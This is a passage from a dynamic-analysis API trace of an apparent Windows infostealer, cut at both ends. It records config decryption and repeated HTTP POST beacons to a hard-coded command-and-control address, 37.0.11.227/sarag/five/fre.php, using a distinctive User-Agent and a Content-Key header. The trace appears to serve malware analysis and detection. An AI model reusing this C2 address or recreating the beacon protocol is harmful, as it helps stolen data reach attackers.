(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0342.929] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.933] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0342.933] GetProcessHeap () returned 0x690000 [0342.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0342.933] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0342.935] GetProcessHeap () returned 0x690000 [0342.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0342.936] GetProcessHeap () returned 0x690000 [0342.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0342.936] GetProcessHeap () returned 0x690000 [0342.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0342.937] GetProcessHeap () returned 0x690000 [0342.937] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0342.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.938] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0342.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.950] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0342.957] GetProcessHeap () returned 0x690000 [0342.957] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0342.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.959] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0342.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.960] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0342.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.961] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0342.961] GetProcessHeap () returned 0x690000 [0342.961] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0342.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.965] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0342.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.966] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0342.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.968] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0342.968] GetProcessHeap () returned 0x690000 [0342.968] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0342.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.969] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0342.969] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.970] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0342.971] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.971] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0342.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.972] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0342.972] GetProcessHeap () returned 0x690000 [0342.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0342.972] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0342.973] GetProcessHeap () returned 0x690000 [0342.973] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0342.973] socket (af=2, type=1, protocol=6) returned 0xc60 [0342.973] connect (s=0xc60, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0342.999] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0342.999] GetProcessHeap () returned 0x690000 [0342.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0342.999] GetProcessHeap () returned 0x690000 [0342.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0343.000] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0343.001] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0343.001] GetProcessHeap () returned 0x690000 [0343.001] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0343.001] GetProcessHeap () returned 0x690000 [0343.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0343.001] GetProcessHeap () returned 0x690000 [0343.002] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0343.002] GetProcessHeap () returned 0x690000 [0343.002] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0343.002] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0343.003] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0343.003] GetProcessHeap () returned 0x690000 [0343.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0343.003] GetProcessHeap () returned 0x690000 [0343.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0343.004] send (s=0xc60, buf=0x6ad508*, len=242, flags=0) returned 242 [0343.004] send (s=0xc60, buf=0x6aba40*, len=159, flags=0) returned 159 [0343.005] GetProcessHeap () returned 0x690000 [0343.005] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0343.005] recv (in: s=0xc60, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0343.091] GetProcessHeap () returned 0x690000 [0343.092] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0343.092] GetProcessHeap () returned 0x690000 [0343.092] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0343.092] GetProcessHeap () returned 0x690000 [0343.093] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0343.093] GetProcessHeap () returned 0x690000 [0343.093] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0343.093] closesocket (s=0xc60) returned 0 [0343.096] GetProcessHeap () returned 0x690000 [0343.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0343.096] GetProcessHeap () returned 0x690000 [0343.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0343.097] GetProcessHeap () returned 0x690000 [0343.097] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0343.099] GetProcessHeap () returned 0x690000 [0343.099] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0343.099] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19b0) returned 0xc60 [0343.101] Sleep (dwMilliseconds=0xea60) [0343.114] GetProcessHeap () returned 0x690000 [0343.114] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0343.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.115] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0343.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.121] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0343.129] GetProcessHeap () returned 0x690000 [0343.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0343.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.130] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0343.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.131] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0343.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.131] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0343.132] GetProcessHeap () returned 0x690000 [0343.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0343.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.133] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0343.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.134] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0343.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.135] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0343.135] GetProcessHeap () returned 0x690000 [0343.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0343.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.136] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0343.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.137] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0343.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.137] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0343.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.138] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0343.138] GetProcessHeap () returned 0x690000 [0343.138] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0343.138] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0343.139] GetProcessHeap () returned 0x690000 [0343.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0343.140] GetProcessHeap () returned 0x690000 [0343.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0343.140] GetProcessHeap () returned 0x690000 [0343.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0343.140] GetProcessHeap () returned 0x690000 [0343.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0343.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.142] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0343.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.152] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0343.199] GetProcessHeap () returned 0x690000 [0343.199] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0343.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.203] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0343.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.204] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0343.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.205] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0343.205] GetProcessHeap () returned 0x690000 [0343.206] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0343.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.207] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0343.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.208] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0343.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.209] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0343.209] GetProcessHeap () returned 0x690000 [0343.209] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0343.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.210] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0343.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.213] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0343.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.214] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0343.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.215] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0343.215] GetProcessHeap () returned 0x690000 [0343.215] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0343.215] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0343.215] GetProcessHeap () returned 0x690000 [0343.216] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0343.216] socket (af=2, type=1, protocol=6) returned 0xc64 [0343.216] connect (s=0xc64, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0343.246] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0343.246] GetProcessHeap () returned 0x690000 [0343.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0343.246] GetProcessHeap () returned 0x690000 [0343.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0343.247] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0343.248] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0343.248] GetProcessHeap () returned 0x690000 [0343.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0343.248] GetProcessHeap () returned 0x690000 [0343.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0343.249] GetProcessHeap () returned 0x690000 [0343.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0343.249] GetProcessHeap () returned 0x690000 [0343.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0343.249] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0343.250] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0343.250] GetProcessHeap () returned 0x690000 [0343.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0343.250] GetProcessHeap () returned 0x690000 [0343.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0343.251] send (s=0xc64, buf=0x6ad508*, len=242, flags=0) returned 242 [0343.251] send (s=0xc64, buf=0x6aba40*, len=159, flags=0) returned 159 [0343.251] GetProcessHeap () returned 0x690000 [0343.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0343.252] recv (in: s=0xc64, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0343.329] GetProcessHeap () returned 0x690000 [0343.330] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0343.330] GetProcessHeap () returned 0x690000 [0343.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0343.331] GetProcessHeap () returned 0x690000 [0343.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0343.331] GetProcessHeap () returned 0x690000 [0343.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0343.332] closesocket (s=0xc64) returned 0 [0343.334] GetProcessHeap () returned 0x690000 [0343.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0343.335] GetProcessHeap () returned 0x690000 [0343.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0343.336] GetProcessHeap () returned 0x690000 [0343.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0343.336] GetProcessHeap () returned 0x690000 [0343.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0343.337] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19b4) returned 0xc64 [0343.338] Sleep (dwMilliseconds=0xea60) [0343.340] GetProcessHeap () returned 0x690000 [0343.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0343.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.341] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0343.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.349] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0343.357] GetProcessHeap () returned 0x690000 [0343.357] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0343.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.358] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0343.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.359] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0343.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.360] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0343.360] GetProcessHeap () returned 0x690000 [0343.360] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0343.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.394] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0343.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.396] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0343.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.397] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0343.397] GetProcessHeap () returned 0x690000 [0343.397] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0343.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.398] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0343.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.402] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0343.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.403] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0343.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.404] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0343.404] GetProcessHeap () returned 0x690000 [0343.404] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0343.404] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0343.405] GetProcessHeap () returned 0x690000 [0343.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0343.405] GetProcessHeap () returned 0x690000 [0343.406] HeapFree (in: 